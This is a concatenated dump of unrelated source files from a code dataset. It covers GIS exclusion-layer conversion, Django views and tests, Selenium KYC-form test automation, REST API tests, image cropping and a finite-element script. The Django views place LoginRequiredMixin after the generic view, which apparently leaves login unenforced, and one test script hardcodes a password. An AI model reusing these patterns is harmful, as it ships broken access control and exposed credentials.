Parameters\n ----------\n layer : str\n Layer to extract\n geotiff : str\n Path to geotiff file\n \"\"\"\n self._extract_layer(self._excl_h5, layer, geotiff=geotiff,\n hsds=self._hsds)\n\n @classmethod\n def layers_to_h5(cls, excl_h5, layers, chunks=(128, 128),\n replace=True, check_tiff=True,\n transform_atol=0.01, coord_atol=0.001,\n descriptions=None, scale_factors=None):\n \"\"\"\n Create exclusions .h5 file, or load layers into existing exclusion .h5\n file from provided geotiffs\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n layers : list | dict\n List of geotiffs to load\n or dictionary mapping goetiffs to the layers to load\n chunks : tuple, optional\n Chunk size of exclusions in Geotiff, by default (128, 128)\n replace : bool, optional\n Flag to replace existing layers if needed, by default True\n check_tiff : bool, optional\n Flag to check tiff profile and coordinates against exclusion .h5\n profile and coordinates, by default True\n transform_atol : float, optional\n Absolute tolerance parameter when comparing geotiff transform data,\n by default 0.01\n coord_atol : float, optional\n Absolute tolerance parameter when comparing new un-projected\n geotiff coordinates against previous coordinates, by default 0.001\n description : dict, optional\n Description of exclusion layers, by default None\n scale_factor : dict, optional\n Scale factors and dtypes to use when scaling given layers,\n by default None\n \"\"\"\n if isinstance(layers, list):\n layers = {os.path.basename(lyr).split('.')[0]: lyr\n for lyr in layers}\n\n if descriptions is None:\n descriptions = {}\n\n if scale_factors is None:\n scale_factors = {}\n\n excls = cls(excl_h5, chunks=chunks, replace=replace)\n logger.info('Creating {}'.format(excl_h5))\n for layer, geotiff in layers.items():\n logger.info('- Transfering {}'.format(layer))\n description = descriptions.get(layer, None)\n scale = scale_factors.get(layer, None)\n if scale is not None:\n scale_factor = scale['scale_factor']\n dtype = scale['dtype']\n else:\n scale_factor = None\n dtype = None\n\n excls.geotiff_to_layer(layer, geotiff, check_tiff=check_tiff,\n transform_atol=transform_atol,\n coord_atol=coord_atol,\n description=description,\n scale_factor=scale_factor,\n dtype=dtype)\n\n @classmethod\n def extract_layers(cls, excl_h5, layers, chunks=(128, 128),\n hsds=False):\n \"\"\"\n Extract given layers from exclusions .h5 file and save to disk\n as GeoTiffs\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n layers : dict\n Dictionary mapping layers to geotiffs to create\n chunks : tuple\n Chunk size of exclusions in .h5 and Geotiffs\n hsds : bool\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS\n \"\"\"\n excls = cls(excl_h5, chunks=chunks, hsds=hsds)\n logger.info('Extracting layers from {}'.format(excl_h5))\n for layer, geotiff in layers.items():\n logger.info('- Extracting {}'.format(geotiff))\n excls.layer_to_geotiff(layer, geotiff)\n\n @classmethod\n def extract_all_layers(cls, excl_h5, out_dir, chunks=(128, 128),\n hsds=False):\n \"\"\"\n Extract all layers from exclusions .h5 file and save to disk\n as GeoTiffs\n\n Parameters\n ----------\n excl_h5 : str\n Path to .h5 file containing or to contain exclusion layers\n out_dir : str\n Path to output directory into which layers should be saved as\n GeoTiffs\n chunks : tuple\n Chunk size of exclusions in .h5 and Geotiffs\n hsds : bool\n Boolean flag to use h5pyd to handle .h5 'files' hosted on AWS\n behind HSDS\n \"\"\"\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n excls = cls(excl_h5, chunks=chunks, hsds=hsds)\n logger.info('Extracting layers from {}'.format(excl_h5))\n for layer in excls.layers:\n geotiff = os.path.join(out_dir, \"{}.tif\".format(layer))\n logger.info('- Extracting {}'.format(geotiff))\n excls.layer_to_geotiff(layer, geotiff)\n","sub_path":"reVX/utilities/exclusions_converter.py","file_name":"exclusions_converter.py","file_ext":"py","file_size_in_byte":24186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34820599","text":"from django.views.generic import ListView, CreateView, UpdateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Post\nfrom .forms import PostForms\n\n\nclass PostListView(ListView):\n model = Post\n ordering = '-created_at'\n template_name = 'home.html'\n\n\nclass PostCreateView(CreateView, LoginRequiredMixin):\n model = Post\n form_class = PostForms\n template_name = 'training/post_create.html'\n success_url = '/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(PostCreateView, self).form_valid(form)\n\n\nclass PostUpdateView(UpdateView, LoginRequiredMixin):\n model = Post\n form_class = PostForms\n template_name = 'training/post_update.html'\n success_url = '/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(PostUpdateView, self).form_valid(form)\n","sub_path":"training/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440922213","text":"#!/usr/bin/env python\n\nimport numpy as np\n\n###make a grid in [c,d], c and d are vectors, with m points in each dimension\n###X is array of vector to form the grid\n\ndef cartesian(X,final=None):\n X=[np.asarray(i) for i in X]\n dtype=X[0].dtype\n n=np.prod([i.size for i in X])\n if final is None:\n final=np.zeros([n,len(X)],dtype=dtype)\n \n m=n/X[0].size\n final[:,0]=np.repeat(X[0],m)\n if X[1:]:\n cartesian(X[1:],final=final[0:m,1:])\n for j in xrange(1,X[0].size):\n final[j*m:(j+1)*m,1:]=final[0:m,1:]\n return final\n\ndef grid (c,d,m):\n k=len(c)\n X=[]\n for i in xrange(k):\n X.append(np.linspace(c[i],d[i],m))\n return cartesian(X)\n","sub_path":"Python/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650613630","text":"from selenium import webdriver\nimport time\nfrom basepage import basepage\nimport re\nimport random\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport os\n\nclass kycdata(basepage):\n \"\"\"此类中封装获取邮件/手机验证码,及kyc表单填写的基本操作\"\"\"\n\n #定义初始化函数,实例化基本类传参\n def __init__(self):\n self.dr=webdriver.Chrome()\n self.base=basepage(self.dr)\n\n #点击验证联系方式\n def contact(self):\n self.clickweb('button.el-button--primary > span')\n\n #进入邮箱短信页面(初级函数)\n def emailpage(self):\n self.dr.find_element_by_css_selector('div[width=\"200\"] li:nth-of-type(5) > .ivu-menu-submenu-title > span').click()\n time.sleep(1)\n self.dr.find_element_by_css_selector('div[width=\"200\"] [href=\"/report/emailrecord\"]').click()\n time.sleep(1)\n\n #获取邮箱验证码\n def get_emailcode(self,idnum):\n #切换窗口\n self.windsw(1)\n time.sleep(1)\n #输入主账户进行筛选\n self.css('div.ivu-input-wrapper-default>input').clear()\n time.sleep(1)\n self.inputform('div.ivu-input-wrapper-default>input',idnum)\n time.sleep(1)\n self.clickweb('div.ivu-input-wrapper-default>div.ivu-input-group-append>button>i.ivu-icon-ios-search')\n time.sleep(1)\n #排序\n self.clickweb('div.ivu-tabs-content > div:nth-of-type(1) th:nth-of-type(5) i:nth-of-type(2)')\n #获取最新的验证码\n self.dr.find_element_by_xpath('//div[@class=\"ivu-tabs-content\"]//tr[1]/td[3]').click()\n time.sleep(1)\n self.e = self.dr.find_elements_by_xpath('//div[@class=\"ivu-drawer-wrap\"]//tr[2]//tr[4]/td[1]/span')\n self.t = self.e[0].text\n # 输出验证码\n self.emailcode=re.sub(r'\\D','',self.t) #提取数字\n print('当前测试数据邮箱验证码:{}'.format(self.emailcode))\n #关闭弹窗\n self.tpo=self.dr.find_elements_by_css_selector('a.ivu-drawer-close>i.ivu-icon-ios-close')\n time.sleep(1)\n self.tpo[1].click()\n return self.emailcode\n\n #填写邮箱验证码\n def code_pr(self,idnumber):\n #点击验证联系方式\n self.contact()\n # 发送邮箱验证码\n self.css('div.el-col-24>button.dialog-sendCode').click()\n time.sleep(1)\n # 调用函数,获取邮箱验证码\n self.get_emailcode(idnumber)\n self.windsw(0)\n time.sleep(1)\n # 输入验证码\n time.sleep(1)\n self.inputform('[placeholder=\"验证码\"]',self.emailcode)\n time.sleep(1)\n #点击下一步\n self.clickweb('button.dialog-submit > span')\n #点击以后再做\n self.clickweb('.doItLeTer-css')\n #点击完成\n self.clickweb('button.dialog-submit > span')\n\n #上传图片\n def upload_img(self):\n self.css('div.upload-box>div.upload-text>div.icon').click()\n time.sleep(1)\n os.system(r'E:\\test\\client_kyc.exe')\n time.sleep(1)\n\n #填写kyc表单\n def kyc_form(self):\n # 上传图片\n self.upload_img()\n time.sleep(1)\n # 随机选择性别\n sex = self.dr.find_elements_by_css_selector('label.el-radio>span>span.el-radio__inner')\n sex[random.choice([0, 1])].click()\n time.sleep(1)\n self.css('[placeholder=\"请选择出生日期为DD-MM-YYYY的格式\"]').click()\n time.sleep(1)\n self.css('div.el-date-picker__header > span:nth-of-type(1)').click()\n # 年份\n selty = self.dr.find_element_by_css_selector('.el-icon-d-arrow-left')\n ActionChains(self.dr).double_click(selty).perform() # 双击\n selty.click()\n time.sleep(1)\n by = self.dr.find_elements_by_css_selector('table.el-year-table>tbody>tr>td')\n by[random.randint(0, 9)].click()\n time.sleep(1)\n # 月份\n bm = self.dr.find_elements_by_css_selector('table.el-month-table>tbody>tr>td')\n bm[random.randint(0, 11)].click()\n time.sleep(1)\n # 日期\n bd = self.dr.find_elements_by_css_selector('table.el-date-table>tbody>tr>td')\n bd[random.randint(0, 41)].click()\n time.sleep(1)\n # 随机输入证件号码\n self.inputform('[placeholder=\"请输入证件号码\"]',self.randomint(8))\n time.sleep(1)\n #输入随机地址\n self.inputform('[placeholder=\"请输入地址\"]',self.randomstr(8))\n #接受条款\n self.clickweb('label.agree-checkbox>span.el-checkbox__input>span.el-checkbox__inner')\n time.sleep(1)\n #提交\n self.clickweb('button.submit-btn > span')\n time.sleep(1)\n\n #kyc认证\n def kycfulfill(self,idnum):\n #手机邮箱验证\n self.code_pr(idnum)\n time.sleep(2)\n #KYC表格填写\n self.kyc_form()\n time.sleep(1)\n self.clickweb('button.side-nav-cell .menu-font') #回到首页\n time.sleep(1)","sub_path":"creat_accout/registerofcp/kyc_formfill.py","file_name":"kyc_formfill.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"359159036","text":"import datetime\n\nfrom django.test import TestCase\nfrom example.app.widgets.models import Widget, Customer, Purchase, PurchaseItem, Store, User\nfrom unittest import skip\n\n\nclass WidgetTests(TestCase):\n\n def setUp(self):\n user = User.objects.create(username='testuser')\n store = Store.objects.create(owner=user)\n basic_obj = Widget(name='testwidget',\n color='Black',\n size='Small',\n shape='Rectangle',\n store=store)\n basic_obj.save()\n dummy_obj = Widget(name='dummywidget',\n color='Green',\n size='Medium',\n shape='Ellipse',\n store=store)\n dummy_obj.save()\n\n def test_all(self):\n obj = Widget.objects.get(name='testwidget')\n self.assertEqual(obj.name, 'testwidget')\n self.assertEqual(obj.color, 'Black')\n self.assertEqual(obj.size, 'Small')\n self.assertEqual(obj.shape, 'Rectangle')\n\n def test_create_new(self):\n store = Store.objects.first()\n obj = Widget.objects.create(name='otherwidget',\n color='Red',\n size='Large',\n shape='Triangle',\n store=store)\n obj.save()\n\n other = Widget.objects.get(name='otherwidget')\n self.assertEqual(other.name, 'otherwidget')\n self.assertEqual(other.color, 'Red')\n self.assertEqual(other.size, 'Large')\n self.assertEqual(other.shape, 'Triangle')\n\n obj2 = Widget.objects.create(color='Red',\n size='Large',\n shape='Triangle',\n store=store)\n\n self.assertEqual(obj2.name, 'Red.Large.Triangle')\n\nclass PurchaseTests(TestCase):\n\n def setUp(self):\n user = User.objects.create(username='testuser')\n store = Store.objects.create(owner=user)\n widg1 = Widget(name='testwidget',\n color='Black',\n size='Small',\n shape='Rectangle',\n store=store)\n widg1.save()\n widg2 = Widget(name='dummywidget',\n color='Green',\n size='Medium',\n shape='Ellipse',\n store=store)\n widg2.save()\n cust = Customer.objects.create(name='testcust',\n state='Florida',\n gender='M',\n age='29')\n purch1 = Purchase(customer=cust)\n purch1.save()\n purch1.add_item(widg1)\n purch1.add_item(widg2)\n purch1.save()\n\n def test_customer_methods(self):\n cust = Customer.objects.get(name='testcust')\n pur = Purchase.objects.first()\n self.assertEqual(cust.purchases.first(), pur)\n\n self.assertEqual(cust.name, 'testcust')\n self.assertEqual(cust.state, 'Florida')\n self.assertEqual(cust.gender, 'M')\n self.assertEqual(cust.age, 29)\n\n def test_items_added(self):\n purch1 = Purchase.objects.first()\n self.assertQuerysetEqual(purch1.items.all(),\n PurchaseItem.objects.all(),\n transform=lambda x: x,\n ordered=False)\n\n def test_get_customer(self):\n purch1 = Purchase.objects.first()\n self.assertIsInstance(purch1.customer, Customer)\n\n def test_correct_cost(self):\n purch1 = Purchase.objects.first()\n widg1 = Widget.objects.get(name='testwidget')\n widg2 = Widget.objects.get(name='dummywidget')\n pur_cost = purch1.get_cost()\n widg_cost = widg1.cost + widg2.cost\n self.assertEqual(pur_cost, widg_cost)\n\n def test_item_count(self):\n purch1 = Purchase.objects.first()\n self.assertEqual(purch1.items.count(), Widget.objects.all().count())\n\n def test_sale_date(self):\n purch1 = Purchase.objects.first()\n self.assertEqual(purch1.sale_date.date(),\n datetime.datetime.now().date())\n\n def test_sale_price_profit(self):\n purch1 = Purchase.objects.first()\n pur_sale_price = purch1.sale_price\n\n widg1 = Widget.objects.get(name='testwidget')\n widg2 = Widget.objects.get(name='dummywidget')\n widg_cost = widg1.cost + widg2.cost\n\n widg_sale_price = round(widg_cost * 1.5, 2)\n self.assertEqual(pur_sale_price, widg_sale_price)\n\n pur_profit = purch1.profit\n widg_profit = round(widg_cost * 0.5, 2)\n self.assertEqual(pur_profit, widg_profit)\n","sub_path":"example/tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"10770113","text":"import time\nimport json\nimport logging\nimport requests\n\ntestLog = logging.getLogger('test')\ntestLog.setLevel(logging.DEBUG)\ntestHandle = logging.StreamHandler()\ntestFormatter = logging.Formatter(\"[%(asctime)s] %(levelname)s %(message)s\", '%Y-%m-%d %H:%M:%S')\ntestHandle.setLevel(logging.DEBUG)\ntestHandle.setFormatter(testFormatter)\ntestLog.addHandler(testHandle)\n\nlogger = logging.getLogger('test')\n\n\nrequest_json = {\n \"req_info\":{\n \"data\":{\n \"si_phonenum\" : '15977798889'\n }\n }\n}\n\n\nclass RequestTest(object):\n # 初始化自动向登录接口获取cookies\n def __init__(self, module_name):\n self.url = \"http://127.0.0.1:8005/api/v1.0/config/%s/\"%module_name\n self.headers = {'user-agent':'Mozilla/5.0','Content-Type':'application/json'}\n self.cookies = self.login_response_data().cookies\n\n # GET 测试\n def get_response_data(self):\n response_data = requests.get(self.url,\n timeout = 30,\n headers = self.headers,\n cookies=self.cookies)\n response_data.raise_for_status()\n response_data.encoding = 'utf-8'\n res = response_data.json()\n return res\n\n # DELETE 测试\n def delete_response_data(self, del_id):\n del_url = self.url + str(del_id) + '/'\n response_data = requests.delete(url = del_url,\n timeout = 30,\n headers = self.headers,\n cookies=self.cookies)\n response_data.raise_for_status()\n response_data.encoding = 'utf-8'\n res = response_data.json()\n time.sleep(5)\n return res['ack_result']['status']\n\n # post 测试\n def post_response_data(self, data):\n response_data = requests.post(self.url,\n json = data,\n timeout = 30,\n headers = self.headers,\n cookies = self.cookies)\n response_data.raise_for_status()\n res = response_data.json()\n return res\n\n # PUT 测试\n def put_response_data(self, put_id, data = request_json):\n put_id = self.url + str(put_id) + '/'\n response_data = requests.put(put_id,\n json = data,\n timeout = 30,\n headers = self.headers,\n cookies = self.cookies)\n response_data.raise_for_status()\n res = response_data.json()\n # 延时请求\n time.sleep(5)\n return res\n\n # 初始登录\n def login_response_data(self):\n url = \"http://127.0.0.1:8005/api/v1.0/commfunc/login/\"\n post_data = {\n \"req_info\":{\n \"data\":{\n \"user_name\": \"hudeli\",\n \"user_password\": \"12345\",\n \"terminal_type\": \"APP\",\n \"adid\":1\n }\n }\n }\n response_data = requests.post(url,\n data = json.dumps(post_data),\n headers = self.headers)\n response_data.raise_for_status()\n response_data.encoding = 'utf-8'\n return response_data\n\n\nif __name__ == '__main__':\n ratio = RequestTest('SysIccard')\n data = ratio.get_response_data()\n\n # 新增测试\n for i in range(30):\n iccard_num = str(time.time())[::-1].replace('.', '') + '%04d' % i\n request_json['req_info']['data']['si_cardnum'] = iccard_num\n res = ratio.post_response_data(request_json)\n if res['ack_result']['status'] == 'OK':\n logger.info('SUCCESS %s' % res['ack_result']['info'])\n else:\n logger.error('ERROR %s' % res['ack_result']['info'])\n time.sleep(10)\n\n # # 修改测试\n # if data['ack_result']['data']:\n # id_list = [did['id'] for did in data['ack_result']['data']]\n # for p in map(ratio.put_response_data, id_list):\n # logger.info('PUT SUCCESS %s ' % p['ack_result']['status'])\n\n # # 删除测试\n # if data['ack_result']['data']:\n # id_list = [data['id'] for data in data['ack_result']['data']]\n # for result in map(ratio.delete_response_data,id_list):\n # logger.info('DELETE SUCCESS %s' % result)","sub_path":"python_up/python_web_test/automation/tests_requests/login_delete.py","file_name":"login_delete.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"555193773","text":"from classes.game import Person, bcolors\n\n# Name of Magics Spells\n# Magic\nmagic = [{\"name\" : \"Fire\", \"cost\" : 10, \"dmg\" : 60},\n { \"name\" : \"Thunder\", \"cost\" : 12, \"dmg\" : 80},\n {\"name\": \"Blizzard\", \"cost\" : 10, \"dmg\" : 60}]\n\n# Generate the player and enemy character\nplayer = Person(460, 65, 60, 34, magic)\nenemy = Person(1200, 65, 45, 25, magic)\n\n# Initialise the running variable\nrunning = True\ni = 0 \n\nprint(bcolors.FAIL + bcolors.BOLD + \"AN ENEMY ATTACKS!\"+ bcolors.ENDC)\n\n# Creating the Gaming Loop\n\nwhile running:\n print(\"========================\")\n # Damage done by player to Enemy\n player.choose_action()\n choice = input(\"Choose Action:\")\n index = int(choice) - 1\n if index == 0:\n dmg = player.generate_damage()\n enemy.take_damage(dmg)\n print(\"You attacked for \", dmg, \" points of damage. Enemy HP:\", enemy.get_hp())\n \n # Damage done by enemy to player\n enemy_choice = 1\n enemy_dmg = enemy.generate_damage()\n player.take_damage(enemy_dmg)\n print(\"Enemy attacks for \", enemy_dmg, \" Player HP:\", player.get_hp())\n\n\n\n","sub_path":"RPG_battle_script/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"675540","text":"from io import open\n\nimport requests_mock\nimport testtools\n\nimport rxv\n\nFAKE_IP = '10.0.0.0'\nDESC_XML = 'http://%s/YamahaRemoteControl/desc.xml' % FAKE_IP\n\n\ndef sample_content(name):\n with open('tests/samples/%s' % name, encoding='utf-8') as f:\n return f.read()\n\n\nclass TestRXV(testtools.TestCase):\n\n @requests_mock.mock()\n def test_basic_object(self, m):\n m.get(DESC_XML, text=sample_content('rx-v675-desc.xml'))\n rec = rxv.RXV(FAKE_IP)\n self.assertEqual(\n rec.ctrl_url,\n 'http://%s/YamahaRemoteControl/ctrl' % FAKE_IP)\n self.assertEqual(\n rec.unit_desc_url,\n 'http://%s/YamahaRemoteControl/desc.xml' % FAKE_IP)\n\n\nclass TestDesc(testtools.TestCase):\n\n @requests_mock.mock()\n def test_discover_zones(self, m):\n m.get(DESC_XML, text=sample_content('rx-v675-desc.xml'))\n rec = rxv.RXV(FAKE_IP)\n zones = rec.zone_controllers()\n self.assertEqual(len(zones), 2, zones)\n self.assertEqual(zones[0].zone, \"Main_Zone\")\n self.assertEqual(zones[1].zone, \"Zone_2\")\n","sub_path":"tests/test_rxv.py","file_name":"test_rxv.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156799204","text":"# util to crop the image\n# initially it was simple just to cut the top\n# now it's becoming advance, seems to be working fine (21.10.2021)\n\nimport numpy as np\n\nCUT_definition = 'Provide a proper argument (float or int) in crop.py\\n\\\n argument between 0 and 1 is percentage, more than 1 is number of pixels\\n\\\ne.g. cut=0.42 is 42% and cut=33 is 33 pixels'\n\nSIDE_definition = \"Provide a proper argument (str or list) in crop.py\\n\\\npossible values are 't' for top, \\\n'b' for bottom, 'l' for left, and 'r' for right. \\\nYou may combine sides -> side='tb' to cut from top and bottom.\\n\"\n\n\ndef crop(img: np.ndarray, side: str = 't', cut: float = 0.2, log: bool = 0) -> np.ndarray:\n \"\"\"\n util to crop the image.\n defaults to 20 % from the top.\\n\n possible values are 't' for top,\n 'b' for bottom, 'l' for left, and 'r' for right.\n You may combine sides -> side='tb' to cut from top and bottom.\\n\n argument between 0 and 1 is percentage, more than 1 is number of pixels\n e.g. cut=0.42 is 42% and cut=33 is 33 pixels.\\n\n log=1 to print dimensions.\n \"\"\"\n if not isinstance(side, (str, list)):\n raise SystemExit(SIDE_definition)\n if not isinstance(cut, (float, int)):\n raise SystemExit(CUT_definition)\n if 0 < cut < 1:\n method = 'percent'\n elif cut > 1:\n method = 'pixel'\n else:\n raise SystemExit(CUT_definition)\n top, left = 0, 0\n bottom = img.shape[0]\n right = img.shape[1]\n if cut > bottom or cut > right:\n raise SystemExit('Arguments are bigger than image dimensions.\\\n Check value of in crop.py')\n if 't' in side:\n top = calculate(bottom, method, cut)\n if 'b' in side:\n bottom = bottom - calculate(bottom, method, cut)\n if 'l' in side:\n left = calculate(right, method, cut)\n if 'r' in side:\n right = right - calculate(right, method, cut)\n if log:\n print(f'arguments provided: side={side}, cut={cut}, log={log}')\n print(f\"original dimensions are {img.shape}\")\n print('top, bottom, left, right: ', top, bottom, left, right)\n print(F\"cropped dimensions are {img[top:bottom, left:right].shape}\")\n return img[top:bottom, left:right]\n\n\ndef calculate(side, method, cut) -> int:\n \"\"\"\n small util for crop function.\n calculates the new side value.\n \"\"\"\n if method == 'percent':\n return int(side * cut)\n if method == 'pixel':\n return int(cut)\n","sub_path":"testmy/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"333981840","text":"from app import db\nfrom flask_sqlalchemy import SQLAlchemy\n\n\n\nclass FundRaiser(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n ngoName = db.Column(db.String(80))\n fundRaisingName = db.Column(db.String(80))\n amountCollected = db.Column(db.Integer)\n amountTargeted = db.Column(db.Integer)\n\n def __init__(self, ngoName, fundRaisingName, amountTargeted):\n self.ngoName = ngoName\n self.fundRaisingName = fundRaisingName\n self.amountTargeted = amountTargeted","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"284317083","text":"# makes KratosMultiphysics backward compatible with python 2.6 and 2.7\nfrom __future__ import print_function, absolute_import, division\n\nimport sys\nimport math\n\nfrom KratosMultiphysics import *\nfrom KratosMultiphysics.Contact_2DApplication import *\nfrom KratosMultiphysics.UserCustomApplication import *\nimport numpy as np\n\nmodel_part = ModelPart(\"ModelPart\")\nmodel_part.AddNodalSolutionStepVariable(DISPLACEMENT)\nmodel_part.AddNodalSolutionStepVariable(VELOCITY)\nmodel_part.AddNodalSolutionStepVariable(ACCELERATION)\nmodel_part.AddNodalSolutionStepVariable(FORCE)\nmodel_part.AddNodalSolutionStepVariable(POSITIVE_FACE_PRESSURE)\nmodel_part.AddNodalSolutionStepVariable(NEGATIVE_FACE_PRESSURE)\nmodel_part.AddNodalSolutionStepVariable(IS_BODY)\nmodel_part.AddNodalSolutionStepVariable(IS_COVER)\n\nmodel_part_io = ModelPartIO(\"InputData\")\nmodel_part_io.ReadModelPart(model_part)\n\n# we add the DoFs\nfor node in model_part.Nodes:\n node.AddDof(DISPLACEMENT_X)\n node.AddDof(DISPLACEMENT_Y)\n node.AddDof(DISPLACEMENT_Z)\n # print(node)\n# set d time in process info\n# model_part.ProcessInfo[DELTA_TIME] = 0.01\n\nBodyRecognitionProcess(model_part, 2).Execute()\nBoundaryRecognitionProcess(model_part, 2).Execute()\n\n\n# print(\"NumberOfMeshes is \", model_part.NumberOfMeshes())\n\ntime_scheme = ResidualBasedIncrementalUpdateStaticScheme()\n# time_scheme = BossakTimeScheme(0.9)\nlinear_solver = SkylineLUFactorizationSolver()\nconv_criteria = DisplacementCriteria(1e-6, 1e-9)\nbuilder_and_solver = ResidualBasedEliminationBuilderAndSolver(\n linear_solver)\n\nspace_utils = UblasSparseSpace()\n\npA = space_utils.CreateEmptyMatrixPointer()\npDx = space_utils.CreateEmptyVectorPointer()\npb = space_utils.CreateEmptyVectorPointer()\npri = space_utils.CreateEmptyVectorPointer()\npr0 = space_utils.CreateEmptyVectorPointer()\npun0 = space_utils.CreateEmptyVectorPointer()\npun = space_utils.CreateEmptyVectorPointer()\n\nA = (pA).GetReference()\nDx = (pDx).GetReference()\nb = (pb).GetReference()\nri = (pri).GetReference()\nr0 = (pr0).GetReference()\nun0 = (pun0).GetReference()\nun = (pun).GetReference()\n\ntime_scheme.InitializeSolutionStep(model_part, A, Dx, b)\ntime_scheme.InitializeElements(model_part)\n\nbuilder_and_solver.SetUpDofSet(time_scheme, model_part)\nbuilder_and_solver.SetUpSystem(model_part)\nbuilder_and_solver.ResizeAndInitializeVectors(\n pA, pDx, pb, model_part.Elements, model_part.Conditions, model_part.ProcessInfo)\n\nbuilder_and_solver.InitializeSolutionStep(model_part, A, Dx, b)\nbuilder_and_solver.SetEchoLevel(1)\n\nspace_utils.ResizeVector(ri, b.Size())\nspace_utils.ResizeVector(r0, b.Size())\nspace_utils.ResizeVector(un0, b.Size())\nspace_utils.ResizeVector(un, b.Size())\n\nspace_utils.SetToZeroMatrix(A)\nspace_utils.SetToZeroVector(Dx)\nspace_utils.SetToZeroVector(b)\nspace_utils.SetToZeroVector(ri)\nspace_utils.SetToZeroVector(r0)\nspace_utils.SetToZeroVector(un0)\nspace_utils.SetToZeroVector(un)\n\n#Creating GidIO\ngid_mode = GiDPostMode.GiD_PostBinary # or GiDPostMode.GiD_PostAscii\nuse_multi_file = MultiFileFlag.MultipleFiles # or MultiFileFlag.SingleFile\ndeformed_mesh_flag = WriteDeformedMeshFlag.WriteDeformed # or WriteDeformedMeshFlag.WriteUndeformed\nwrite_conditions = WriteConditionsFlag.WriteElementsOnly # or WriteConditionsFlag.WriteConditions\n\ngid_io = GidIO(\"test\",gid_mode,use_multi_file,deformed_mesh_flag, write_conditions)\n\ngid_io.InitializeMesh( 0.0 )\ngid_io.WriteMesh(model_part.GetMesh() ) \ngid_io.FinalizeMesh()\n\ntime_step = 1e-3\nmodel_part.SetBufferSize(2)\nmodel_part.CloneTimeStep()\nmodel_part.ProcessInfo[DELTA_TIME] = time_step \n\nlhs = np.zeros((b.Size() + 5, b.Size() + 5))\nrhs = np.zeros(b.Size() + 5)\ndx = np.zeros(b.Size() + 5)\n\nbuilder_and_solver.BuildRHS(time_scheme, model_part, r0)\ngid_io.InitializeResults(0.0,(model_part).GetMesh()) \nfor i in range(1):\n epsilon = 1.0\n while epsilon > 1e-12:\n space_utils.SetToZeroMatrix(A)\n space_utils.SetToZeroVector(Dx)\n space_utils.SetToZeroVector(ri)\n\n builder_and_solver.Build(time_scheme, model_part, A, ri)\n for r in range(b.Size()):\n rhs[r] = r0[r]\n for c in range(b.Size()):\n lhs[r,c] = A[r,c]\n\n lhs[0,11] = -1.00\n lhs[0,14] = 1/3\n\n lhs[1,12] = -1.00\n lhs[1,14] = 2/3\n lhs[1,15] = 2/3\n\n lhs[2,13] = -1.00\n lhs[2,15] = 1/3\n\n lhs[3,11] = 2.5/3\n\n lhs[4,11] = 0.5/3\n lhs[4,12] = 1/2\n lhs[4,14] = -1.00\n\n lhs[5,15] = -1.00\n lhs[5,12] = 1/2\n lhs[5,11] = 0.5/3\n\n lhs[6,13] = 2.5/3\n ###\n lhs[11,0] = 1.00\n lhs[11,3] = -1.5/2\n lhs[11,4] = -0.5/2\n\n lhs[12,2] = 1.00\n lhs[12,6] = -1.5/2\n lhs[12,5] = -0.5/2\n\n lhs[13,1] = 1.00\n lhs[13,4] = -1/2\n lhs[13,5] = -1/2\n\n lhs[14,4] = 1.00\n lhs[14,0] = -1/3\n lhs[14,1] = -2/3\n\n lhs[15,5] = 1.00\n lhs[15,1] = -2/3\n lhs[15,2] = -1/3\n \n dx = np.dot(np.linalg.inv(lhs), rhs)\n \n for r in range(b.Size()):\n Dx[r] = dx[r]\n\n space_utils.ScaleAndAdd(1, Dx, 1, un);\n \n if (space_utils.TwoNorm(Dx) == 0):\n print(\"Dx = 0!!!\")\n sys.exit(1)\n # builder_and_solver.SystemSolve(A, Dx, r0 + ri)\n # print(\"A is \", A)\n # print(\"r0 is \", r0)\n # print(\"ri is \", ri)\n # print(\"Dx is \", Dx)\n space_utils.ScaleAndAdd(1, Dx, 1, un);\n \n time_scheme.Update(model_part, builder_and_solver.GetDofSet(), A, Dx, r0)\n \n if space_utils.TwoNorm(un - un0) < 1e-12:\n epsilon = space_utils.TwoNorm(Dx)\n else:\n epsilon = space_utils.TwoNorm(Dx)/space_utils.TwoNorm(un-un0)\n # print(\"epsilon is \", epsilon)\n break\n\n # var = raw_input(\"Finish step, go ahead?: \")\n # if var == '0':\n # sys.exit(1) \n\n print(\"conv is \", epsilon)\n for node in model_part.Nodes:\n print(\"curr disp is \", node.GetSolutionStepValue(DISPLACEMENT_Y, 0))\n # print(\"delta u is \", un - un0)\n space_utils.ScaleAndAdd(1, un, 0, un0)\n model_part.CloneTimeStep()\n 